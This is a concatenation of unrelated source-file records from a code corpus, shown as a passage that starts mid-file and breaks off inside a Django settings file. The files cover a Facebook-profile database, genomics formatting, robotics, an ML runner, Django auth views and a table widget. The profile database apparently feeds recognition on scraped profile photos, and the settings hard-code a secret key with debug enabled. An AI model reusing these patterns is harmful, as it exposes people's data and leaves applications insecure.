self.cursor.execute(\"\"\"SELECT name FROM sqlite_master WHERE type='table' AND name='pessoas';\"\"\")\n \n for linha in self.cursor.fetchall():\n exist = True\n \n if(not exist):\n self.criarBanco();\n\n def criarBanco(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE pessoas (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n nome TEXT NOT NULL,\n linkFacebook TEXT NOT NULL,\n novo boolean DEFAULT TRUE,\n fotoPerfilAnalisada boolean DEFAULT FALSE\n );\n \"\"\")\n self.novoPerfil(Config.get('FacebookAccount', 'myName') , Config.get('FacebookAccount', 'myPerfil') )\n \n def novoPerfil(self, nome, link):\n if(not self.verificaPerfilExistente(link)):\n self.cursor.execute(\"\"\"INSERT INTO pessoas (nome, linkFacebook) VALUES (?,?)\"\"\", (nome, link) )\n self.conn.commit()\n # self.conn.close()\n\n def getProximoPerfil(self):\n retorno = \"\";\n linhas = self.cursor.execute(\"\"\"SELECT linkFacebook FROM pessoas where novo = 1 limit 1;\"\"\")\n for linha in self.cursor.fetchall():\n retorno = linha[0]\n\n return retorno;\n\n def getProximoPerfilReconhecimento(self):\n retorno = \"\";\n linhas = self.cursor.execute(\"\"\"SELECT linkFacebook, id, nome FROM pessoas where fotoPerfilAnalisada = 0 limit 1; \"\"\")\n for linha in self.cursor.fetchall():\n retorno = linha\n\n return retorno;\n\n def verificaPerfilExistente(self, link):\n linhas = self.cursor.execute(\"\"\"\n SELECT 1 FROM pessoas where linkFacebook = ? \n \"\"\", (link,))\n\n if(self.cursor.fetchall() == []):\n return False\n else:\n return True\n\n def atualizarParaBuscando(self, link):\n self.cursor.execute(\"\"\"UPDATE pessoas SET fotoPerfilAnalisada = 1 WHERE linkFacebook = ? \"\"\", [link] )\n self.conn.commit()\n","sub_path":"DBControl.py","file_name":"DBControl.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149031915","text":"#\n# Copyright (c) 2020-2021 Arm Limited and Contributors. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n#\nimport unittest\nfrom mbed_tools.devices._internal.windows.component_descriptor_utils import (\n is_undefined_data_object,\n is_undefined_value,\n data_object_to_dict,\n UNKNOWN_VALUE,\n)\nfrom collections import namedtuple\nimport random\n\n\ndef generate_valid_values():\n return random.choice([\"a test\", 4646.454, 54, True])\n\n\ndef generate_undefined_values():\n return random.choice([0, None, False, UNKNOWN_VALUE])\n\n\nclass TestUtilities(unittest.TestCase):\n def test_is_value_undefined(self):\n self.assertTrue(is_undefined_value(generate_undefined_values()))\n self.assertFalse(is_undefined_value(generate_valid_values()))\n\n def test_is_data_object_undefined(self):\n field_number = 30\n DataObjectType = namedtuple(\"data_object_example\", [f\"field{i}\" for i in range(0, field_number)])\n test1 = DataObjectType(*[generate_undefined_values() for i in range(0, field_number)])\n self.assertTrue(is_undefined_data_object(test1))\n test2 = DataObjectType(*[generate_valid_values() for i in range(0, field_number)])\n self.assertFalse(is_undefined_data_object(test2))\n\n def test_to_dict(self):\n field_number = 30\n DataObjectType = namedtuple(\"data_object_example\", [f\"field{i}\" for i in range(0, field_number)])\n expected_dictionary = {\n f\"field{i}\": random.choice([generate_valid_values(), generate_undefined_values()])\n for i in range(0, field_number)\n }\n test = DataObjectType(**expected_dictionary)\n self.assertDictEqual(data_object_to_dict(test), expected_dictionary)\n","sub_path":"tests/devices/_internal/windows/test_component_descriptor_utils.py","file_name":"test_component_descriptor_utils.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"613611377","text":"from atmPy.general import timeseries as _timeseries\nfrom atmPy.general import flightpath as _flightpath\nimport xarray as xr\nimport pandas as pd\nimport metpy\nimport metpy.calc\n\nclass BalloonSounding(object):\n def __init__(self, data, column_lat='Lat', column_lon='Lon', column_altitude='Altitude'):\n if isinstance(data, xr.core.dataarray.Dataset):\n self.data = data\n else:\n # some old code ...not sure how valuable\n self.timeseries = _timeseries.TimeSeries(data)\n self.vertical_profile = self.timeseries.convert2verticalprofile()\n self.flight_path = _flightpath.FlightPath(self.timeseries, column_lat=column_lat, column_lon=column_lon, column_altitude=column_altitude)\n \n self._tpw = None\n \n \n @property\n def precipitable_water(self):\n if isinstance(self._tpw, type(None)):\n \n dser = pd.Series(index = self.data.site, dtype=float)\n \n for site in self.data.site:\n ds_sel = self.data.sel(site = site)\n # ds_sel = ds_sel.dropna('index') # just to double check, this made no difference\n pressure = ds_sel.pressure * metpy.units.units.hPa\n dewpoint = ds_sel.dewpoint * metpy.units.units.degC\n tpw = metpy.calc.precipitable_water(pressure, dewpoint)\n tpw = tpw.to('cm')\n dser.loc[str(site.values)] = tpw.magnitude\n \n datpw = dser.to_xarray()\n datpw = datpw.rename({'index': 'site'})\n datpw.attrs['unit'] = 'cm'\n self._tpw = datpw\n return self._tpw","sub_path":"atmPy/atmosphere/sounding.py","file_name":"sounding.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"253604436","text":"from django.shortcuts import render, redirect, reverse, HttpResponse\nfrom django.contrib import auth, messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserLoginForm, UserRegistrationForm \nfrom django.contrib.auth import get_user_model\n\n# Create your views here.\ndef index(request):\n return render(request, \"accounts/index.template.html\")\n \ndef logout(request):\n auth.logout(request)\n messages.success(request, \"You have successfully logged out\")\n return redirect(reverse(\"index\"))\n \ndef login(request):\n #returns login page\n if request.method == \"POST\":\n login_form = UserLoginForm(request.POST)\n \n if login_form.is_valid():\n user = auth.authenticate(username=request.POST[\"username\"], password=request.POST[\"password\"])\n \n \n if user:\n auth.login(user=user, request=request)\n messages.success(request, \"You have successfully logged in.\")\n return redirect(reverse(\"index\"))\n else:\n # login_form.add_error(None, \"Invalid username or password\")\n messages.error(request, \"Invalid username or password\")\n return render(request, \"accounts/login.template.html\", {\n \"form\":login_form\n })\n else:\n login_form = UserLoginForm()\n return render(request, \"accounts/login.template.html\", {\n \"form\":login_form\n })\n \n@login_required\ndef profile(request):\n User = get_user_model()\n user = User.objects.get(email=request.user.email)\n return render(request, 'accounts/profile.template.html', {\n 'user' : user\n })\n\n \ndef register(request):\n User = get_user_model()\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n \n form.save()\n \n user = auth.authenticate(username=request.POST['username'],\n password=request.POST['password1'])\n \n if user:\n \n auth.login(user=user, request=request)\n messages.success(request, \"You have successfully registered\")\n else:\n messages.error(request, \"Unable to register your account at this time\")\n return redirect(reverse('index'))\n \n else:\n return render(request, 'accounts/register.template.html', {\n 'form':form\n })\n else:\n \n form = UserRegistrationForm()\n return render(request, 'accounts/register.template.html', {\n 'form':form\n })","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616936289","text":"# inf = 1/0\n\nnumerator = 1000\ndenominator = 0\n\n#EXCEPTIONS\nprint(\" --- EXCEPTIONS --- \")\n\ntry:\n result_div = numerator / denominator\nexcept NameError:\n print(\" /_\\ numerator or denominator has not been defined\")\nexcept TypeError:\n print(\" /_\\ numerator or denominator variable type is not compatible with division\")\nexcept ZeroDivisionError:\n print(\" /_\\ Are you really trying to divide by zero ?\")\nelse:\n print(result_div)\n\n#ASSERTS\nprint(\" --- ASSERTS --- \")\nyear = \"two thousand twelwe\" #-2012\n\ntry:\n year = int(year) # Conversion de l'année\n assert year > 0\nexcept ValueError:\n print(\"You must enter a number\")\nexcept AssertionError:\n print(\"The year is negative !\")\n\n#RAISE AN EXCEPTION\nprint(\" --- RAISE AN EXCEPTION --- \")\n\nyear = -10\n\ntry:\n year = int(year)\n if year <= 0:\n print(\"condition verified...\")\n raise ValueError(\"Year is negative\")\nexcept ValueError:\n #print(ValueError)\n print(\"Value is not valid.\")\n\n# EXCEPTION HIERARCHY\n# Exceptions are not only classes but they also have a hierarchy according to a precise heritage scheme. To know more about it look at heritage.py\n","sub_path":"exceptions_and_asserts.py","file_name":"exceptions_and_asserts.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"16025169","text":"#!/usr/bin/env pybricks-micropython\n\nfrom pybricks.hubs import EV3Brick\n\nfrom pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,\n InfraredSensor, UltrasonicSensor, GyroSensor)\n\nfrom pybricks.parameters import Port, Stop, Direction, Button, Color\n\nfrom pybricks.tools import wait, StopWatch, DataLog\n\nfrom pybricks.robotics import DriveBase\n\nfrom pybricks.media.ev3dev import SoundFile, ImageFile\n\n\n# Made by HandsonTechnology \n# This program requires LEGO EV3 MicroPython v2.0 or higher.\n# Click \"Open user guide\" on the EV3 extension tab for more information.\n\n# Create your objects here.\nev3 = EV3Brick()\n\n#Write your program here.\n\n#Hello 라고 말한다.\nev3.speaker.say('Hello')\n\n#기본 비프음을 1번 재생한다.\nev3.speaker.beep()\n\n#20 ms 기다린다. (쉼표의 개념)\nwait(20)\n\n#1500 Hz의 주파수를 1000 ms 동안 재생한다.\nev3.speaker.beep(1500,1000)\n\n#EV3 에 내장된 파일을 재생한다.\nev3.speaker.play_file(SoundFile.EV3)\n\n\n\ndo = 523\nre = 587\nmi = 659\n\nev3.speaker.beep(mi, 500)\nwait(20)\nev3.speaker.beep(re, 500)\nwait(20)\nev3.speaker.beep(do, 500)\nwait(20)\nev3.speaker.beep(re, 500)\nwait(20)\nev3.speaker.beep(mi, 500)\nwait(20)\nev3.speaker.beep(mi, 500)\nwait(20)\nev3.speaker.beep(mi, 500)\nwait(20)\n\n\n\n\n\nbrick.display.text('World') #World 제일 위에 표시\nwait(1000)\nbrick.display.clear() #디스플레이 지우기\nbrick.display.text('Hello',(60, 50)) #(60,50) 위치에 Hello 표시 \nwait(1000)\nbrick.display.image(ImageFile.LEFT) #LEFT 이미지 표시\nwait(1000)\n","sub_path":"hubs/01-speaker.py","file_name":"01-speaker.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247549677","text":"import json\nimport Ex1 \n\nInputfile = open('HomeworkTextFile.txt','r')\npathlist = (Inputfile.read()).split('\\n')\nnamelist = [Ex1.ExtractFileName(i) for i in pathlist]\npathlist = [{'path': i} for i in pathlist]\nnamelist = [{'file_name': i} for i in namelist]\npathlist=[dict(pathlist[i],**namelist[i]) for i in range(len(pathlist))]\nwith open('path.json','w') as of:\n json.dump(pathlist,of)\n","sub_path":"Week 1/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392247106","text":"import math\n\nfrom path_following.config import NODE_SIZE\nfrom path_following.destination import Destination\nfrom path_following.movement_mode import MovementMode\n\n\nclass Vectorizer:\n def __init__(self, minimize=False):\n self.robot_position = None\n self.robot_angle = None\n self.minimize = minimize\n self.path = []\n self.mode = MovementMode.GRIP\n self.cm_to_pixel = 6.882391855\n self.distance_correction_threshold = 3*self.cm_to_pixel\n self.length_correction_threshold = 0\n self.angle_correction_threshold = 0\n self.checkpoint_trigger_threshold = 55\n self.last_checkpoint = None\n self.goal = None\n self.checkpoint = None\n\n self.destination = Destination.OTHER\n\n self.objective = None\n\n def set_mode(self, mode: MovementMode):\n self.mode = mode\n\n def set_destination_mode(self, destination: Destination):\n self.destination = destination\n\n def set_robot_position(self, position: (int, int)):\n self.robot_position = position\n\n # update checkpoint\n node_distances = [\n i for i, node in enumerate(self.path) if distance(self.robot_position, node) <= self.checkpoint_trigger_threshold\n ]\n # node_distances = [\n # i for i, node in enumerate(self.path) if self.robot_position[0] >= node[0] or distance(self.robot_position, node) <= 50\n # ]\n if node_distances:\n if self.checkpoint is None or node_distances[-1] > self.checkpoint:\n self.checkpoint = node_distances[-1]\n\n def set_path(self, path: [(float, float)]):\n # if self.destination is Destination.PUCK:\n path = self.shorten_path_to_grab_puck(path)\n self.path = self.minimize_path(path)\n # # if self.destination is Destination.PUCK or self.destination is Destination.CORNER:\n # # else:\n # # self.path = path\n self.objective = None\n self.checkpoint = None\n\n def minimize_path(self, path: [[float, float]]):\n if path and len(path) > 1:\n minimized_path = [path[0]]\n elif len(path) == 1:\n path = [self.robot_position, path[0]]\n current_angle = math.atan2(path[1][1] - path[0][1], path[1][0] - path[0][0])\n for i, node in enumerate(path[2:-1]):\n x, y = node\n\n x2, y2 = path[i+1]\n angle_between_last_one = math.atan2(y-y2, x-x2)\n\n if angle_between_last_one == current_angle:\n current_angle = angle_between_last_one\n continue\n current_angle = angle_between_last_one\n minimized_path.append((x2, y2))\n\n if path[-1] != minimized_path[-1]:\n minimized_path.append(path[-1])\n return minimized_path\n\n def shorten_path_to_grab_puck(self, path: [(float, float)]):\n distances = [distance(node, self.goal) for node in path]\n new_path = []\n for i, distance_from_goal in enumerate(distances):\n new_path.append(path[i])\n if distance_from_goal <= 112:\n break\n return new_path\n\n def set_goal(self, goal: (int, int)):\n self.goal = goal\n\n def set_destination(self, destination: Destination):\n self.destination = destination\n\n def minimize_vectors(self, vectors: [[float, float]]):\n minimized_vectors = []\n for i, vector in enumerate(vectors):\n length, angle = vector\n if angle != 0:\n minimized_vectors.append(vector)\n elif angle == 0:\n if not minimized_vectors:\n minimized_vectors.append(vector)\n else:\n last_vector_distance, last_vector_angle = minimized_vectors[-1]\n minimized_vectors[-1] = [last_vector_distance + length, last_vector_angle]\n return minimized_vectors\n\n def get_path_from_robot(self, nodes: [(float, float)]):\n if self.checkpoint is None:\n self.checkpoint = 0\n\n node_distances = [\n distance(self.robot_position, node)\n for node in nodes[self.checkpoint+1:]\n ]\n\n if not node_distances:\n return [self.robot_position]\n\n minimum_distance = min(node_distances)\n index = node_distances.index(minimum_distance) + self.checkpoint + 1\n\n self.objective = nodes[index]\n if self.robot_is_close_to_path(minimum_distance):\n if self.checkpoint_was_updated_recently():\n return nodes[self.checkpoint+1:]\n else:\n return nodes[index:]\n else:\n return nodes[index:]\n\n def checkpoint_was_updated_recently(self):\n return distance(self.robot_position, self.path[self.checkpoint]) <= NODE_SIZE\n\n def robot_is_close_to_path(self, minimum_distance_from_path):\n return minimum_distance_from_path <= self.distance_correction_threshold\n\n def vectorize(self, nodes: [(float, float)]):\n vectors = []\n for i in range(len(nodes)-1):\n x1, y1 = nodes[i]\n x2, y2 = nodes[i+1]\n length = ((x2-x1)**2 + (y2-y1)**2)**0.5\n angle = -math.atan2(y2-y1, x2-x1)\n\n if angle == -0:\n angle = 0\n elif angle == -math.pi:\n angle = math.pi\n\n vector = [length, angle]\n vectors.append(vector)\n return vectors\n\n def adjust_vector_angles_from_robot_pov(self, vectors: [[float, float]]):\n \"\"\"\n Changes the vectors' orientation from their absolute value from the top camera\n to the angle the robot will need to use to align itself with the vector.\n (For all vectors)\n \"\"\"\n new_vectors = []\n if self.mode is MovementMode.OHMMETER:\n last_vector = [None, self.robot_angle - math.pi/2]\n else:\n last_vector = [None, self.robot_angle]\n\n for vector in vectors:\n length, angle = self.adjust_vector_angle_from_robot_pov(last_vector, vector)\n if abs(angle) <= self.angle_correction_threshold:\n angle = 0\n if abs(length) <= self.length_correction_threshold:\n length = 0\n new_vectors.append([length, angle, self.mode])\n last_vector = vector\n return new_vectors\n\n def adjust_vector_angle_from_robot_pov(self, robot_angle, vector_angle):\n \"\"\"\n Changes the vector orientation from the absolute value from the top camera\n to the angle the robot will need to use to align itself with the vector.\n (For one vector)\n \"\"\"\n if vector_angle< 0:\n vector_angle = 2 * math.pi +vector_angle\n if robot_angle< 0:\n robot_angle = 2 * math.pi + robot_angle\n\n angle_correction = vector_angle - robot_angle\n\n if angle_correction > math.pi:\n angle_correction -= 2 * math.pi\n elif angle_correction < -math.pi:\n angle_correction += 2 * math.pi\n return angle_correction\n\n def set_robot_angle(self, robot_angle):\n self.robot_angle = robot_angle\n\n def path_to_vectors(self):\n path_from_robot = self.get_path_from_robot(self.path)\n\n if self.destination is Destination.PUCK or self.destination is Destination.CORNER:\n tuple_length_angle = self.calculate_distance_and_angle()\n return [(tuple_length_angle[0], tuple_length_angle[1], MovementMode.GRIP)]\n\n elif self.destination is Destination.RESISTANCE_STATION:\n tuple_length_angle = self.calculate_distance_and_angle()\n return [(tuple_length_angle[0], tuple_length_angle[1], MovementMode.GRIP)]\n else:\n tuple_length_angle = self.calculate_distance_and_angle()\n return [(tuple_length_angle[0], tuple_length_angle[1], MovementMode.GRIP)]\n\n def calculate_distance_and_angle(self):\n if self.objective is not None:\n xp, yp = self.robot_position\n xg, yg = self.objective\n\n length = ((xg-xp)**2 + (yg-yp)**2)**0.5\n\n angle_correction = self.find_goal_angle(yg - yp, xg- xp, self.destination)\n\n return length, angle_correction\n else:\n raise Exception(\"wtf, objective is none\")\n\n def find_goal_angle(self, diff_y, diff_x, destination):\n angle = -math.atan2(diff_y, diff_x)\n if angle == -0:\n angle = 0\n elif angle == -math.pi:\n angle = math.pi\n\n if angle < 0:\n angle = 2 * math.pi + angle\n if self.robot_angle < 0:\n self.robot_angle = 2 * math.pi + self.robot_angle\n\n angle_correction = angle - self.robot_angle\n\n if angle_correction > math.pi:\n angle_correction -= 2 * math.pi\n elif angle_correction < -math.pi:\n angle_correction += 2 * math.pi\n\n if destination == \"RESISTANCE\":\n angle_correction -= math.pi/2\n elif destination == \"CENTER\":\n pass\n else:\n pass\n\n return angle_correction\n\n def robot_is_on_goal(self):\n \"\"\"\n # TODO:\n We don't do a final angle correction if robot_is_on_goal because it will always want to correct the\n angle to 0 degrees. We can actually try to toggle this on/off in the lab to see the robot's\n actual behavior.\n \"\"\"\n return distance(self.robot_position, self.goal) <= NODE_SIZE/2\n\n\ndef distance(point1, point2):\n x1, y1 = point1\n x2, y2 = point2\n return math.sqrt(pow(x2-x1, 2) + pow(y2-y1, 2))\n","sub_path":"station/path_following/path_following/vectorizer.py","file_name":"vectorizer.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"356980622","text":"#TCGAFormat.py\n#This program will format miRNA_seq, CNA, and mutation data to be MOCA compatible.\nimport glob\n\ndef format_data(adjust_id, adjust_gene, space):\n #opens file\n infilename = input(\"Enter file name: \")\n raw_data = open(infilename, \"r\")\n raw_data_list = raw_data.readlines()\n raw_data_length = len(raw_data_list) #number of lines in the text file\n\n #creates new file\n formatted_data = open(infilename[:len(infilename)-8], \"w\")\n print(infilename[:len(infilename)-8])\n \n #formats patient ID\n if (space == 1):\n patient_id_list = raw_data_list[0].split()\n else:\n patient_id_list = raw_data_list[0].split(\"\\t\")\n \n for i in range(adjust_id): #removes gene symbol, locus ID, and cytoband to make it MOCA friendly\n patient_id_list.pop(0)\n patient_list_length = len(patient_id_list)\n for i in range(patient_list_length): #writes the formatted ID to the file\n formatted_data.write(patient_id_list[i][:12]+\" \") #data is tab delimited\n formatted_data.write(\"\\n\")\n\n #formats gene data\n for i in range(1, raw_data_length):\n gene_data_list = raw_data_list[i].split(\"\\t\")\n for j in range(adjust_gene): #removes locus ID and cytoband to make it MOCA friendly\n gene_data_list.pop(1)\n for j in range(len(gene_data_list)): #writes feature along with its data members to the file\n gene_data_list[j] = gene_data_list[j].strip(\"\\n\")\n formatted_data.write(gene_data_list[j]+\" \") #data is tab delimited\n formatted_data.write(\"\\n\")\n\ndef format_mutation():\n formatted_data = open(\"LAMLMutation\", \"w\")\n features = []\n for infilename in glob.glob('./LAML/MutationCallsLevel3/*.txt'):\n formatted_data.write(infilename[27:39]+\" \")\n raw_data = open(infilename, \"r\")\n tempfeatures = [Line.split()[0] for Line in raw_data][1:]\n features = features + tempfeatures\n raw_data.close()\n formatted_data.write(\"\\n\")\n print(\"With Duplicates: \", len(features))\n features = list(set(features))\n features = sorted(features)\n print(\"Without Duplicates: \", len(features))\n\n print(features[1:100])\n print('\\n')\n print('\\n')\n\n for feature in features:\n print(\"Testing:.... \", feature)\n formatted_data.write(feature + \" \")\n\n for infilename in glob.glob('./LAML/MutationCallsLevel3/*.txt'):\n #print(feature, \"\\t\", infilename)\n raw_data = open(infilename, \"r\")\n features_infile = [Line.split()[0] for Line in raw_data][1:]\n\n raw_data.seek(0, 0)\n if feature in features_infile:\n indices = [i for i, x in enumerate(features_infile) if x == feature]\n raw_data_list = raw_data.readlines() \n mutationCount = 0\n \n for index in indices:\n #print(feature, \" is in the file @ index: \", index+1) \n line_index = raw_data_list[index+1]\n line_index = line_index.split(\"\\t\")\n #print(line_index)\n \n if (line_index[8] != \"Silent\"):\n mutationCount = mutationCount + 1\n \n formatted_data.write(str(mutationCount) + \" \")\n \n else:\n formatted_data.write(\"0\"+\" \")\n raw_data.close()\n\n #print('\\n')\n formatted_data.write(\"\\n\")\n\n \n#main\ndef main():\n data_type = input(\"Enter the type of data that is being formatted (mRNA, miRNA, CNA, or Mutation): \")\n if (data_type == \"mRNA\"):\n format_data(2, 0, 1)\n elif (data_type == \"miRNA\"):\n format_data(2, 0, 1)\n elif (data_type == \"CNA\"):\n format_data(3, 2, 0)\n elif (data_type == \"Mutation\"):\n format_mutation()\n\n\n\nmain()\n","sub_path":"TCGA/TCGAFormat.py","file_name":"TCGAFormat.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"44990001","text":"from back_office.banco import depositar_monto_en_cuenta_de_usuario\nfrom django.contrib.auth.models import User\nimport logging\n\nlog = logging.getLogger(__name__)\n\n__author__ = 'bryan'\n\n\n\nclass PlanCompensacionSeis():\n NUMERO_PLAN = 6\n\n def __init__(self):\n log.info(\"Creating %s\" % self.__class__)\n user_admin = User.objects.get(is_superuser=1)\n if not user_admin:\n log.error(\"No puedo crear el Plan No. 6. Usuario admin no encontrado\")\n raise \"No puedo crear el Plan No. 6. Usuario admin no encontrado\"\n\n def asignar_beneficios_usuarios(self, beneficios):\n log.info(\"Plan %s: BENEFICIOS DE EMPRESA 1%. Asignando beneficios.\" % self.NUMERO_PLAN)\n users = User.objects.all()\n por_ciento = beneficios * 1 / 100\n for user in users:\n if user.perfilusuario.membresia.tipo_membresia.id > 1:\n depositar_monto_en_cuenta_de_usuario(user.id, por_ciento, self.NUMERO_PLAN)\n log.info(\"Plan %s: Beneficios asignados exitosamente...\" % self.NUMERO_PLAN)\n","sub_path":"back_office/planes/compensacion6.py","file_name":"compensacion6.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"267739068","text":"import tensorflow as tf\nfrom utils.utils import get_args\nfrom utils.config import process_config\nfrom utils.config import get_config_from_json\nfrom utils.factory import create\nfrom utils.dirs import create_dirs\nfrom utils.logger import Logger\nfrom utils.copy_codebase_new import copy_codebase\nimport os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"True\"\n\n\ndef run_multi():\n # Get the arguments\n args = get_args()\n config, _ = get_config_from_json(args.config)\n values_xx = config.exp.vals_0\n values_zz = config.exp.vals_0\n params = config.exp.params\n section = config.exp.section\n # Spectral Normalization\n for i in values_xx:\n # Mode\n for j in values_zz:\n\n config[section][params[0]] = i\n config[section][params[1]] = j\n config.exp.name = args.experiment + \"_{}_{}\".format(i, j)\n process_config(config)\n create_dirs(\n [\n config.log.summary_dir,\n config.log.checkpoint_dir,\n config.log.step_generation_dir,\n config.log.log_file_dir,\n config.log.codebase_dir,\n ]\n )\n # Copy the model code and the trainer code to the experiment folder\n run(config, args)\n tf.reset_default_graph()\n # Delete the session and the model\n\n\ndef run(config, args):\n copy_codebase(config)\n\n l = Logger(config)\n logger = l.get_logger(__name__)\n # Set the random seed\n tf.random.set_seed(config.data_loader.random_seed)\n # Create the tensorflow session\n sess = tf.Session()\n # Create the dataloader\n data = create(\"data_loader.\" + config.data_loader.name)(config)\n # Create the model instance\n model = create(\"models.new.\" + config.model.name)(config)\n # Create the summarizer Object\n summarizer = create(\"utils.\" + config.log.name)(sess, config)\n # Create the trainer\n trainer = create(\"trainers.\" + config.trainer.name)(sess, model, data, config, summarizer)\n # Load model if exists\n model.load(sess)\n # Train the model\n if args.train:\n trainer.train()\n # Test the model\n if config.trainer.test_at_end:\n trainer.test()\n logger.info(\"Experiment has ended.\")\n\n\nif __name__ == \"__main__\":\n run_multi()\n","sub_path":"scripts/running/run_on_titan_parameters_new.py","file_name":"run_on_titan_parameters_new.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"355439933","text":"# encoding: utf-8\n\nfrom ore.yuiwidget.table import BaseDataTableFormatter\n\nfrom bungeni.ui import container \nfrom bungeni.ui import common\nfrom bungeni.ui.i18n import _\nfrom zope.i18n import translate\nfrom zope.security import proxy\nfrom zc.resourcelibrary import need\nfrom zc.table import batching\n\nfrom z3c.pt.texttemplate import ViewTextTemplateFile\nfrom bungeni.ui.utils import url\n\nclass TableFormatter(batching.Formatter):\n \"\"\"The out-of-box table formatter does not let us specify a custom\n table css class.\n \n !+ This is currently being used by the Actions workflow and versions views:\n bungeni/ui/versions.py\n bungeni/ui/workflow.py\n \"\"\"\n \n table_css_class = \"listing grid\"\n \n def __call__(self):\n return (\n '''\n
\n \n %s\n
\n %s\n
''' % (self.table_css_class, self.prefix,\n self.renderContents(), self.renderExtra())\n )\n\nclass ContextDataTableFormatter(BaseDataTableFormatter):\n script = ViewTextTemplateFile(\"templates/datatable.pt\")\n \n data_view =\"/jsonlisting\"\n prefix = \"listing\"\n \n def getFields(self):\n return container.getFields(self.context)\n\n def getFieldColumns(self):\n # get config for data table\n column_model = []\n field_model = []\n\n for field in self.getFields():\n key = field.__name__\n title =translate(_(field.title), context=self.request)\n coldef = {'key': key, 'label': title, 'formatter': self.context.__name__ }\n if column_model == []:\n column_model.append(\n \"\"\"{label:\"%(label)s\", key:\"sort_%(key)s\", \n formatter:\"%(formatter)sCustom\", sortable:true, \n resizeable:true ,\n children: [ \n\t { key:\"%(key)s\", sortable:false}]}\"\"\" % coldef\n )\n else:\n column_model.append(\n \"\"\"{label:\"%(label)s\", key:\"sort_%(key)s\", \n sortable:true, resizeable:true,\n children: [ \n\t {key:\"%(key)s\", sortable:false}]\n }\"\"\" % coldef\n )\n field_model.append('{key:\"%s\"}' % (key))\n return ','.join(column_model), ','.join(field_model)\n \n def getDataTableConfig(self):\n config = {}\n config['columns'], config['fields'] = self.getFieldColumns()\n config['data_url'] = self.getDataSourceURL()\n config['table_id'] = self.prefix\n config['link_url'] = url.absoluteURL(self.context, self.request)\n config['context_name'] = self.context.__name__\n return config\n \n def __call__(self):\n need('yui-datatable')\n need('yui-paginator')\n need('yui-dragdrop')\n \n return '
\\n\\n%s
\\n%s
' % (\n self.prefix,\n self._getCSSClass('table'),\n self.renderContents(),\n self.script(**self.getDataTableConfig()))\n\n\nclass AjaxContainerListing(common.AjaxContainerListing):\n formatter_factory = ContextDataTableFormatter\n \n @property\n def prefix(self):\n context = proxy.removeSecurityProxy(self.context)\n return \"container_contents_%s\" % (context.__name__)\n\n","sub_path":"bungeni.main/branches/mr/bungeni/ui/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"397808799","text":"\"\"\"\nDjango settings for authoringtool project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n \nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '%9xk4ygdnnv128b15+*u#3&tk!d#zi_c!lcd#uwdwimi@yp&n#'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'sequencelistings',\n\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'authoringtool.urls'\n\nWSGI_APPLICATION = 'authoringtool.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 